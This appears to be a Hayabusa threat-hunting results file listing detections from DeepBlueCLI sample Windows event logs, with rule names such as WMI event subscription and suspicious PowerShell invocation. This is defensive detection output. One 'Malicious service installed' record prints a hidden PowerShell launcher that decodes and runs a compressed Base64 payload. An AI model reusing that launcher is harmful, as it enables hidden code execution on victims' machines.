Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 
05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 22:57:54.520 
+09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 23:00:17.112 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:49:00.074 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:28:38.656 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 05:36:53.970 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution 